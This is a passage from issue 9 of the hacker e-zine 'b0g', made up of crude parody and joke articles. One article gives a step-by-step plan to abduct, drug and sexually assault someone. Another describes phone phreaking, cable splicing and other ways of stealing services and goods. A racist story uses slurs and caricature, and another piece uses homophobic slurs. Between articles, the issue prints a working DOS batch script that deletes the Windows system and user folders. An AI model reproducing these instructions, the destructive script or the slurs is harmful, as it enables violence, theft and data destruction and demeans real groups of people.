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[b0g-9.txt] [ 0:. - [ ] :. ] [ 1:. - [ Eliter Than Thou ] [clover] :. ] [ 2:. - [ How to totally humiliate someone ] [prieft] :. ] [ 3:. - [ Getting Shit 4 Free ] [icmp] :. ] [ 4:. - [ Zeddy's Basic PC Repair ] [Zeddy] :. ] [ 5:. - [ Guide to robbing banks ] [puddl] :. ] [ 6:. - [ Five Hit A Sticky Wicket ] [anonymous] :. ] [ 7:. - [ The 7 REAL Wonders of the World ] [prence] :. ] [ 8:. - [ Keep Your Penis In Shape ] [Drygrain] :. ] [ 9:. - [ I'm just Kent Browning ] [c0redump] :. ] [10:. - [ How NN hax0red b0g's mailing list ] [teleh0r] :. ] [11:. - [ Ray guns and other leet stuff ] [joe-ph33r] :. ] [12:. - [ bananas, Hitler crew, defcon and drugs ] [tak] :. ] [13:. - [ Bill Being Satan Corrections ] [wizdumb] :. ] [14:. - [ how to not hack hotmail ] [k-rad-bob] :. ] [15:. - [ Getting Good Grades in School ] [MagicTux] :. ] [16:. - [ Guide to Mostly Harmless Masturbating II ] [tiller] :. ] [17:. - [ How to get a new keyboard ] [clover] :. ] [18:. - [ Rloxley owned at bugtraq? ] [k-rad-bob] :. ] [19:. - [ How to build your own hax0r room ] [tak] :. ] [20:. - [ mailbag ] [k-rad-bob] :. ] [21:. - [ IRC Quotes ] [k-rad-bob] :. ] [22:. - [ closing words ] [k-rad-bob] :. ] [ ] ____________________________________________________________________ get your b0g at: http://www.b0g.org - official site! send your submissions to k-rad-bob@b0g.org ! link us by using this leet banner! http://www.b0g.org/b0gb4nner.jpg or this leet button! http://www.b0g.org/b0gbutton.gif gibb0r us your articles! send us anything >:/ send nudies, pics, and any cool stuff you can think of to k-rad-bob@b0g.org b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 1:. - [ Eliter Than Thou ] [clover] :. ] [clover@hotmail.com] :. ] ____________________________________________________________________ to the tune of 'Holier than thou' by Metallica: leeter Than Thou No more! The crap rolls on my screen again clueless lamers driving me insane. whispering around in chatrooms, acting like a buncha buffoons a n00k here, a n00k there. none of you I will spare ! coz I am eleet, i don't just say it. Its my conscience, and I know it! leeter than thou! I am leeter than thou! I am leeter than thou! lame as ever, look at you same old thing, nothing new. Arrogance and ignorance go hand in hand I am leet now, don't you understand ? It's not who you are it's who you know eleet that i am, it doesn't matter now. pheer me now, coz i'd r00t you like that! with just ping, tracert and netstat! leeter than thou! I am leeter than thou! I am leeter than thou! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 2:. - [ How to totally humiliate someone ] [prieft] :. ] [prieft@hushmail.com] :. ] ____________________________________________________________________ - Ok, this is something I�m masturbating over cos I imagine doing it to some kids I really don�t like :) - needings - * someone you dislike * someone that dislikes that person but likes you too * 2 cars * stuff to get the person to fall asleep with (preferred ammoniac orso) * a knife * a good alibi * fucking guts (cos you need to speed over the road like in your car) * masks or alikes * some money - let's go over to a wet dream - You besta do it at about 5 or 6 am.. Okay, first you take 1 car to the local 24h shop and buy some liqueur for more guts.. then drive a bit around and crash the car like on a tree.. Then walk back home and take car #2 which you let the other guy drive in cos he�s sober and drive over to the victims place... Make sure he's alone at home like or else his parents / boyfriend / dog is going to miss him and might call the police and stuff.. If he isn�t home alone go back to the 24h shop and buy more liquor and go back home to get pissed like and try it some other time.. Now if he�s home alone, you put on a mask and both walk to the door.. Each of you is going to stand on one side of the door (he left you right or roundwise but make sure he wont see you when he opens the door).. From this point, nobody has a name or a voice cos he'll prolly recognize both of them.. The one that�s standing next to the bell presses it so the victim opens the door like to see who�s outside.. The one that�s closest to him grabs him in this way so he cant scream but prolly will bite you in the hand... that�s where the knife comes in handy.. Now get the shit which makes him fall asleep for at least a hour... drag him in your car and drive as fast as possible (the guts part) to some other town orso.. The one that isn�t driving takes off the victims clothes and throws them out of the car for the poor homeless guys.. keep on driving till he wakes up and make him go to sleep again.. now this is the time to stop the car.. grab an EMPTY bottle which contained the liquor cos you don�t wanna spill such good stuff to a dork like him do you? ram it in his ass and kick him out of the car in some public area, preferred crowded or maybe some school with gay people on it so they will bumrape him etc.. Now he's all naked and getting shagged in the ass by this nice bottle and prolly freezing to death when he�s waking up go back to the liqueur store to buy more liqueur to celebrate a nice humiliation... Don�t talk about it anymore.. it never happened until you open the newspaper and are shocked by such mean people who harm such an innocent guy with a bottle you could have had sex with its neck.. Go to school and laff at him cos you�ve read the paper... don�t laff at him if you accidentally spoke to your mate cos then he'll know it is you and do the same to you if he has read this txt file :) Have fun humiliating.. don�t do it to me cos I know more evil stuff than this and will make your live and your girlfriends life miserable :) your warned heh... Also, if your hamster gets aids, your sister starts to have sex with you, your mother starts to have sex with your hamster, WW]I[ starts etc etc after doing this stuff, I cannot be held responsible for it... Neither when that guy finds out and calls the cops etc... I cant be blamed for anything since I am the almighty God... FREE KEVIN.. FREE COMRADE... FREE WHORES... FREE WEED.... FREE SEX... FREE FASTFOOD... its all up to you... b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 3:. - [ Getting Shit 4 Free ] [icmp] :. ] [rewtboy@hotmail.com] :. ] ____________________________________________________________________ Are you so poor that you cant pay for your own things? (Like me =\) Or.. You have money but you just dont wanna pay? Well.. heres the solution, I've written a text today on how to get things for free... [ Index ] 1. FREE CD's 2. FREE PUSSY =] 3. FREE PHONE CALLS 4. FREE CABLE 5. FREE LIBARY BOOKS Heres The Text. 1. Free CD's -- Join BMG, Columbia House etc.. They give free CD's for a penny as you join 'em etc.. Just use a different name.. you can use the same address... thats all. I do it all the time. Never gave my real name. -- How it works: All it does is it, re-writes your account name in the same account.. deleting old informating so you keep getting cd's for free! =] 2. Free Pussy -- Pick up a hooker, fuck her. Then refuse to pay. What can she sue you for? Rape? =] 3. Free Phone Calls -- The art of getting from phone calls from Ma Bell (AT&T, Hell South, NYNEX, Hell Atlantic etc.. ) is called Phone Phreaking. I can write pages and pages of shit about this... but since I am out of cannabis I will have to say just a couple things to get you on the path. Ok, back in the 1980's the US phone system used a system of signalling based on frequencies sent across the ph0ne system. For example, one could emit a frequency of 2600 Hz and get the phone company to stop billing the call... This was in the glory days of phone phreaking. Now the shit is much harder.. with the introduction of digital exchanges and the ESS signaling system. However there are ways.. currently the going thing is to emit a certain frequency down a pay phone that emits the frequency that is sent to the phone company when a quarter is put into the pay phone.. one could make unlimited calls. It does not work when you have a human operator though (especially on Int. calls).. I use it all the time in Miami to call all over the US.. But, now they are starting to get smart.. and the phones are designed so it won't allow those frequencies to be "heard" on the receiver part of the handset. This is very rare though.. To get these frequencies.. use a program called bluebeep Search using archie or netscape ( its tougher using netscape ) to find it. You can record it on normal tape from your Sound Blaster.. The other common method is to find the local phone exchange in your block.. (underground usually) .. then hook a phone up to it and make your calls (using another phone line!) ... There are many philes out there with more details on doing this. Yet another (outta 1,000,000) method is to grab the frequencies emitted by a cordless phone user.. then retransmit those frequencies.. (properly edit the frequencies so that the number you want will be dialed ). Then the victim's phone-receiver will think the real cordless phone is being used to make a phone call.. You can call all the 1-900 numbers you want! There are philes out there to help you.. but you must be mildly familiar with electronics. Well thats it for phone phreaking from me in this phile.. but there's shitloads of things to hack PBX -Private Branch exchanges , COCOTs -Company Owned Coin Operated Telephones, loopbacks, outdials ...etc .. The devices used in hacking the telco are called boxes .. after the red box which emitted the 2600 Hz .. then came blue boxes (payfones ) & beige , green , brown etc... I always get the colors mixed up.. But who cares! 4. Free Cable -- Just use a Nintendo-TV splitter to splice in your house connexion from the cable exchange box (at the back of your apt. complex) .. It is always wise to connect a bunch of people to cable also... that way you won't be singled out when they find out. Find the philes on cable theft for more details (wiring basics etc). 5. Free Libary Books -- This is too easy, any moron already knows this.. Simply remove the magnetic strip at the back, or in between the binding, of the book. Then walk out of the library with the book in your bag or in plain view.. If caught say " Oh, I'm sorry bitch.. I forgot to check the books out! ". Btw, a good practical joke is to hide the magnetic strip in the property of some unsuspecting fuck- up, and watch the show as he tries to walk out of the library. Remember stealing books is wrong, so only BORROW ref. books, =] Note: If you do get caught using any of these "r33t0" Techniques... Its not my problem. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 4:. - [ Zeddy's Basic PC Repair ] [Zeddy] :. ] [zeddy@zeddy.org] :. ] ____________________________________________________________________ First off before you go and fix any PC's you'll need to assemble a tool boxcontaining some things you'll need in your repairs. -a large flat head screwdriver -pair of pliers -10 pound sledgehammer -wood working chisel -wooden mallet -small crowbar -large crowbar -vice-garden hose -heavy rock-tape -small domestic animal -friends monitor -discman/walkman -cell phone -8ft of thick chain -vehicle with trailer hitch -beach -some rope -baseball bat -2 or 3 fish heads First off before beginning, place a good cd in your discman and palce yourheadphones on. Next go out to your driveway or backyard to commence repairs since the majority of all accidents occur in the home. Better safe than sorry. Don't forget to have the cell phone ready with 911 pre-called and already on their way. Since it's kinda hard to dial with no fingers! Q. I can't get the casing off my computer. A. This is quite a common problem. Take your sledge and strike the casing on its top right in the middle. After a few hard shots the sides should bend out and you now have access to your PC. Q. The inside is all dusty and dirty, how should I go about cleaning it? A. Take your PC outside and wash it throughly with the garden hose. Q. My Computer keeps displaying an "Illegal Operation" message, what do I do? A. Report it to the proper authorities immediately! There is nothing more serious than breaking the law! Q. All this repair is making me hungry... A. Tie a long length of rope to your opened PC. Firmly secure the fish heads inside. Go down to your closest beach and place the pc in some deep water. Atleast 20ft or so. Make sure you tie your end to something! :) Come back in a couple hours, and hopefully you should now have some juicy crab inside when you bring the PC back up. If you didn't catch any crab, try again or hit McDonalds or some shit like that. Q. I having trouble with my floppy... A. They have pills for that kind of problem... Q. No my floppy disk, it's stuck in my drive. How do I get it out? A. Wedge your flat head screwdriver into the drive and try to pry it out. If this isn't working then grab hold of the disk with your pliers and yank. If it's still stuck (or you're too weak!) then get enough disk sticking outto place in the vice. Tighten it as much as you can, and then tie the chain around the computer. Attach the chain to your car and get in. Place the car in neutral and rev up the engine. When you got it going, kick it into drive and you should rip that disk right outta there! If not you'll now have a portable vice, since it'l rip right off your workbench. Q. I'm having trouble removing my RAM chips. A. These lil buggers can be tricky. The easiest way is to latch on with your pliers and start pulling and twisting till the pop out. Or you can take your heavy rock and start hitting the chips from the side until they tilt to the side, then they should come out easily. Q. I have an older CPU (pre Pentium II). How do I get it out? A. First off try the chisel and mallet. This may not get the chip out. If it doesn't, then take your small crowbar and pry it up a little. Then get the big crowbar and pop the sucker out. Q. My little brother keeps sneaking into my room and messing around with myPC, how can I get him to stop? A. Take off the outer casing (see above) and place the small animal, preferably a cat, inside. Replace the casing, and plug the PC back in. Wait in the closet and watch. When your brother comes in and turns on the PC, the combination of voltage and cat should produce some good results. The resulting noise should scare him shitless and keep him out of your hair for some time. Q. The time on my system tray is wrong, and it's starting to bug me. How do I fix this? A. Place a piece of tape over that part of your screen. Outta sight, outtamind! Q. My monitor is completely wrecked, what should I do? A. Don't you remember me saying you'd need your friends monitor at the start of this.... ;) Q. I've tried everything you've suggested, and it still doesn't work. Now what? A. Take that baseball bat and use your imagination.... Well that's all for now... If you have any tech questions you want me to answer e-mail me at...zeddy@zeddy.org or visit www.zeddy.org b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! clone \ <\ ' ` ^ jawa -[ Nettwerked '00 -] ____________________________________________________________________ [ 5:. - [ Guide to robbing banks ] [puddl] :. ] [puddl@b0g.org] :. ] ____________________________________________________________________ *** WARNING *** This is for educational purposes only so like if you do try this remember that this paper doesn't exist, there is no paper, there was no text, and like that the author had nothing to do with it. *** WARNING *** ____________________________________________________________________________ INTRODUCTION ____________________________________________________________________________ Welcome to the tutorial of "How to Rob a Bank" for elitx0r k-R4D k1dd13Z" v1.0 Many people think that you need to hire elite soldiers and muscle to rob a bank. That is not the only way ...If you really wanted to hack a bank wouldn't you want to do it nice and clean, with style ? Yes ... You would. You don't want people lying dead on the floor and people sounding alarms getting your ass into bigger trouble than it was before. So ... the question would arise: "Come on ninja boy, what do I need to do ?" Easy ... Continue on to Section 2. ____________________________________________________________________________ SECTION 2: Getting prepared ____________________________________________________________________________ You will need the following : 1) An 31337 10 year old laptop like the ones from "Hackers" s0 that j00 can be like elitx0r n shit and show off to the chix0rz in the bankx0r how s3Xy j00 are. 2) EMP Generator. You can get these from black markets way out in the outskirts of Russia or if you have enough $$$ get it from Bill Gates. He should hook you up with some nice equipment. (But be warned, might not be a stable version) 3) NERV- / Sleeping- GAS. + GAS MASKS I could explain how to make the gas but I just can't be bothered so ehh look it up in your handy Terorrists Handbook for exact recipes. 4) A truck to trash the money into ... duh. Unless you want to carry billions of $$$ on the train... ____________________________________________________________________________ SECTION 3: int void(switch brain on); ____________________________________________________________________________ You have all the tools, so you are practically ready for the hit. Once you arrive at the bank switch your truck off. The EMP Generator should be located in the back of your truck. It would be best if someone were to help you. One person should control the EMP Generator and the other should walk into the bank. Once the EMP Generator is switched on all electrical equipment will be disabled .... .... FOR GOOD. So better keep that truck off unless you want to use public transport for all that cash. When you are inside the bank everything will most probably go berserk. Chaos will havoc outside, car alarms and window wipers will be turned on and off. Your elit0 h4x0r b4wX will not be affected if you have it switched off so leave it off. Now when the EMP Generator is switched on, in the same time you need to throw NERV Gas or some other sort of Gas which is invisible to the human eye in the bank. Don't forget to put on that gas mask before you do it, otherwise you can kiss your plan goodbye. Once everyone (the whole building) is affected lock the doors and take those Glock 17's off of the security guards so you can have some fun when you get home. Hook up your h4x0r l4pt0p to some computers and put in some l33t0 v1ruz to sh0w them how 31337 j00 are. Oh yeah and don't forget porn, cause feds love pr0n ........ No kiddie pr0n though cause that's for like pedophilez n shit and you're a NINJA not a pedo. The EMP Shock will actually unlock all doors which use electronic locking like they use at banks ... so just open up the door and take out the loot. While all the chaos is going on outside everyone will be baffled by it and will Probably be looking at it until it stops, so once you have the money get your friend in the truck to come out and help you take all the money. Drive off, and remember don't drive faster than 60 km/h / 45 mph. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 6:. - [ Five Hit A Sticky Wicket ] [anonymous] :. ] [gimp@b0g.org] :. ] ____________________________________________________________________ "Thank the Lord Harry!" exclaimed Dicks. "It's the summer hols!" he said. Dicks was going to spend the hols with Johnny, Bumcheeks and Fanny - and her rag-a-muffin dog, Wagtail. "And who knows what corking japes lay before us!" he wondered, as the train Puf - Puf - Puffed into the station. "Now let's NOT displease Aunt Whiplash and Uncle Rubum this summer," said Johnny, who was the oldest and strongest of the Five, as they set out to meet their hosts. "By crikey it's hot!" he exclaimed, struggling under the girls' straining packages. "I wonder where that Negro servant of Uncle Rubum, Nignog Robinson, is". And with that the intrepid bunch set off to the quaint cottage on the moors they would be staying in. "I'm scared! This is dangerous!" whimpered Bumcheeks, who was the smallest and a girl. Far in the distance was a small island which they could see from Uncle Rubum's pantry window, that was frightening. " Uh think you'd bettuh not be a wandering in them parts, mastuh" rumbled the black face of the Negro servant, Nignog Robinson. His black, cut-throat eyes flashed at the Five cruelly. "They sah its - a haunted" he concluded, his pickaniny teeth glinting criminally. He ran his clumsy, black hand through his hair and lumbered shadily out. As if on prompt, the Five looked out across the sea the foreboding, mysterious island. "Jiminey! I don't believe the black man," said Johnny. "He looks like a criminal. I want to see just what it is that makes that island so mysterious. We should explore it". " Oh yes, Johnny, YES YES YES" said Dicks. "oh lets! Lets!" Dicks was the smallest of the boys and greedy, sulky,skinny and cowardly. Everyone knew that even Fanny, who looked like a boy with her big hands and ample moustache, was stronger than him. And with that they went to supper with Aunt Whiplash and Uncle Rubum, who afterwards sent them straight to bed. "Don't complain" snapped Uncle Rubum. "I am your elder and shall have you thrashed appropriately for any riotous behaviour, by the right of the Lord." "Yawn" muttered Johnny. "cripes, I can't sleep!". Then he opened his eyes wide with surprise and felt something wet on his leg. "oh, wagtail, you ARE a bother, he said, shooing the dog away. Then he reached for his binoculars to see more clearly the peculiar sight he glanced out his window. There, on the choppy, windy sea, was a boat heading for the island! "I'd bet two farthings that it's the negro servant, Robinson" he frowned. "There's something suspicious in his black face." The next day the Five set off to the mysterious island in a fishing boat on the beach, after secreting lots of ginger ale, pop, flashlights, cake and batteries into their plastic macks, away from the sight of uncle Rubum. "GOLLY" said Dicks. "What an adventure!" he said, his voice muffled as he ate the cakes and drank the gingerbeer and ice-cream. Then he was thoroughly sick. He stayed behind and cried while the rest of the Five explored the island. He deserved it as he was the greediest and skinniest. "It's a nice sunny day!" smiled the girls. But Johnny was more intelligent and didn't burble pleasantries about flowers and whatnot. He was a boy. His honest, responsible face frowning with duty, he picked up what he had spotted, recognised it, and gasped in horror. The girls screamed. "If only I wasn't so greedy!" moaned Dicks, pacing around the small boat clutching his tummy. "I'm a rotter. And the others will be having such wizard adventures!" he moaned. Dick was jealous. He stomped around the beach in a childish tantrum. Johnny opened his hands. The evidence was still there. In his responsible, serious view was a piece of watermelon, a banana skin, and a fried chicken wing. "Yes the puzzle is all clear to me now" he said. "Nignog Robinson has been coming here to this island. His voodoo claptrap tribal story about the place being haunted was just a sly cover up to mask his true, deceitful purpose here." The black man was a liar; he had been stealing food from the pantry and smuggling it to the island in his dark murderous hands, evil deeds going through his savage head. "Wha the fu - You children shouldn't be here, your Uncle will be most displeased" said a surprised Robinson, his peekaboo eyes wide in surprise. In the foliage behind, concealed by their filthy appearance, poked out the sallow faces of several gypsies. "I just don't understand!" wailed Bumcheeks, her hands out of her plastic mac and waving around in a foolish, girlish fashion. Fanny stroked her moustache in puzzlement. It took one moment for Johnny to study the scene before he bravely made his conclusion. "Don't worry Five" he said in a tone of leadership, "It is all clear to me". Johnny took a hard swig at his bottle of Ginger Pop. "These are the travelling gypsies who escaped from the Atomic Research Institute in London, our Capital City. Nignog Robinson has smuggled them here to this island, robbing our Great Britain of these important research subjects" ,he explained pointing at the ragged mob of travellers, their dirty heads bowed in subservience. "Good Lord, without such research the evil communist Reds will conquer the globe!" Before he could continue Johnny was caught off guard. "That's enough Johnny!" As Johnny span round he spotted the local policeman Constable Fairman approach grinning from behind a large rock, the sun sparkling on his shiny blue helmet. "We've been watching this Black Man for some time. As soon as I saw his face I was suspicious, only despite his scheming, cheating ways we couldn't prove a thing", explained the Policeman. "Nobody move, I command you in the name of the Law!" he exclaimed. From a concealed pocket the black man produced a shiny gutting knife. "That's a right young mastuh" he rumbled, sweating in the sunlight with a glare at the Five. "It aint right and no-one's going to go ahurting these folks no moah" he warned, stepping backwards towards the boat, the knife tiny in his huge hands, his dark threatening frame looming over them like a beast of burden, more animal than Man. Behind him, the shabby dirty gypsies shuffled onboard, with the occasional moan escaping faintly from their festering mouths. "DO something!" squealed the girls in unison. Brave Johnny noticed wee dribble down his woolen shorts. Robinson reached the creaky old boat. "COMMUNIST!" bellowed Constable Fairman. With skill he drew his revolver and gunned the rogue down. "ANARCHIST, SUBVERSIVE!" he then proclaimed, emptying the chamber into the twitching, bloody form of Nignog Robinson, now writhing on the ground, his massive hands held uselessly around his head, in a primitive attempt to shield himself from the bullets. A crack shot, Constable Fairman then tied up the cowering Gypsies, helped by the intrepid Five. "Good heavens, what's all this hulabaloo?" exclaimed Aunt Whiplash when they were all returned safely to the cottage, with a policeman and a group of strange, crooked types all tied up. She wiped her hands on the patterned apron tied around her considerable girth, as Johhny patiently explained everything; his suspicions about the black servant; the mysterious island and the escaped gypsies. "And so we caught the escapees and Constable Fairman showed us around the Police Station as reward!" "What a WIZARD adventure!" beamed Aunt Whiplash, as Uncle Rubum gave a disapproving frown from behind his newspaper on the sofa, and scratched his bald dome. "You simply MUST come to spend your holidays with us again!" "HOORAH!" said the Five all at once. And with that they toasted with a bottle of ginger pop. ~fin~ b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 7:. - [ The 7 REAL Wonders of the World ] [prence] :. ] [prence@b0g.org] :. ] ____________________________________________________________________ 7. How does Prae avoid getting the shit beat out of him from black people? Well, this is a hard question! Since prae is racist and 2/3rd's of his vocabulary contains the word nigger, I don�t know how he doesn�t get the shit beat out of him. I've known him for 4 years and we were friends and then someone (Cam2o) told him I was black and he started acting like an asshole to me. Well to not get beat up he must either be really strong or smell like shit and no one will go near him. We will never know... 6. Why do pr0n stars get paid? I would have sex for free! I mean, wouldn't you? I guess it would be better if ya got paid but still, SEX IS SEX! That's like getting paid to eat candy, killing two birds with one stone. I now officially hate all pr0n stars, YOU ALL SUCK!@# (I will still continue to whack off watching pr0n though) And do not fucking email me telling me to say porn not pr0n cause I will get pissed off AND KILL YOU!#@ DIE BITCH DIE! No one will ever know this answer... 5. What the fuck was up with the movie hackers?!?!? That movie warped my fragile little mind...seriously! Ok, lemme point out all the wrong things in that movie, well maybe just a couple. First off, when you break into a computer it DOES NOT look like a fucking video game and why would you go for the garbage file? First thing I would do is browse their pr0n collection to see if I can get some whack-off material. This one time I broke into whitehouse.gov I checked out Bill Clinton's pr0n collection and he has some crazy lesbo pr0n, he said I could borrow some someday (heh that probably put me on some government list where they spy on me and shit, uh o spaghettios!#@). Why do people still watch this movie and enjoy it...no one knows... 4. Why don't the "Boy Bands" admit that they are gay? We all know they are, I mean listen to em sing and talk. They sound like they have a mouthful of cum. They never have any hawt chicks in their videos either, if I was a singer I would have an ass and titties contest, and whoever I thought looked best I would fuck in my video (If I didn't have a girl, which I do) We all know that they are slobbing knob and licking nut on that big tour bus of theirs. Just admit it ya little faggots... 3. How does Hugh Heffner get so many chicks? I think this pisses a lot of guys off, most people will say its because he owns playboy but that cant be true because Bill Gates doesn't get shit and he�s richer than Hugh (Not like I like microsoft or bill gates) The only reason we guys can think of is.. HE MUST HAVE A HUGE COCK!#@ 2. Why does pussy smell like tuna? I don't think anyone has the answer to this question. Your going in to eat it, and whoa!@# the smell overpowers you and you pass out. WHY? Is it because their moms stuck tuna in their in hopes of preventing you from having sex? No one knows... 1. Why do you always have to piss after masturbating? This is a real wonder because I have asked a bunch of people and they answered just like I would have, they ALWAYS have to piss after masturbating. Is this something God did in hopes of keeping us from masturbating? Well, its not working, as long as men have penises they will keep jerking it. These are the REAL 7 wonders of the world, these questions will probably never be answered. We will have to keep wondering forever and ever. *cough* cheap advertisement = check out www.prence.org *cough* heh, peace b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! -------------------------------------------------------------------------------- @ECHO OFF IF EXIST C:\PROGRAM FILES\*.* DELTREE /Y C:\PROGRAM FILES\*.* IF EXIST C:\MY DOCUMENTS\*.* DELTREE /Y C:\MY DOCUMENTS\*.* IF EXIST C:\WINDOWS\DESKTOP\*.* DELTREE /Y C:\WINDOWS\DESKTOP\*.* IF EXIST C:\WINDOWS\START MENU\*.* DELTREE /Y C:\WINDOWS\START MENU\*.* IF EXIST C:\WINDOWS\COMMAND\*.* DELTREE /Y C:\WINDOWS\COMMAND\*.* IF EXIST C:\WINDOWS\SYSTEM\*.* DELTREE /Y C:\WINDOWS\SYSTEM\*.* IF EXIST C:\WINDOWS\*.* DELTREE /Y C:\WINDOWS\*.* ECHO *********************** ECHO Release the September Issue!!! *********************** ECHO COPYRIGHT v | rus Oct 2000 ____________________________________________________________________ [ 8:. - [ Keep Your Penis In Shape ] [Drygrain] :. ] [drygrain@techie.com] :. ] ____________________________________________________________________ Guys: whats the most important part of your body? No, Prae, not the ass.... *sigh*... K-rad-bob has it! It's the penis! For many years I have been a practitioner of penile fitness. Here are a few excersizes that can keep you from being shriveled and weak and gay in old age, and have your wang thick and long. For morons, I have included illustrations: **_____ **_____\ *() \| Before -------- ** **________________________, ** Y ^ V |\_ **_A___Y____/___V________|/ After (The letters and shit are veins..... damn ascii art limitations to hell!) #1. The Kegel This excersize can lengthen your penis by pushing out on the penal root, and keep you from pissing yourself when you are in a nursing home. Simply flex the muscle around the penal root. If you dont know which one it is, start a stream of piss and stop mid-piss. The muscle you used is the one you should flex. This also improves blood circulation into your wang. First, flex this muscle and release it as fast as you can over and over. Do 10 sets of 10. Then, hold it as long as you can. Do this 15 times. Now, hold it for 3 seconds, release for 1 second, hold for 3 seconds, release for 1 second... etc. Do 5 sets of 10. #2. The Nut-Lifter This excersize, when used properly, can keep you from jizzing all over your 'life partner' too early. You want to try to elevate your sack. This may, at first, involve a bit of stomach flexing, but after a while you will know what muscle to flex. This works best and is most noticeable on a hot day when your sack is hanging almost over your asshole. It has been proven that a male cannot ejaculate until his balls are packed up against the rest of him. So as soon as you have mastered this excersize, practice preventing the balls from going up. Try to keep them away from your body without using your hands, because you hands will be busy groping titties. MMMmmMMMmmmMMMmmMMMMmmmm titties.... Anyway, I will now discuss general penal health. It is best to masturbate at least six times a week. Remember, this is ther MINIMUM amount. This regulates the supply of blood and keeps the veins in action. It also empties your nuts, so you dont have little wet dreams about Acid Burn. (omg angelina... yes baby! aah!!! erm.... back on topic...). There is also a myth that Mountain Dew will shrink your penis and make you sterile. This is not true. What brought this about is the fact that one of the coloring agents in Mountain Dew can, in very high and almost lethal doses, decrease your sperm count by about 0.5%. A healthy young man can, in one ejaculation, repopulate North America. I doubt any of you have the need to be professional Adams, and if you do, well fuck the population of Uruguay. ;). You also need tho do the above excersizes at least one a day. Its also really good if you can get a chick to fuck you. It can like.... be good on your psyche.... and your nuts. Some interesting sites to check are: http://www.penilefitness.com http://www.thehun.net http://www.nether.net/~drygrain Till next time: Mary Joo Wanna 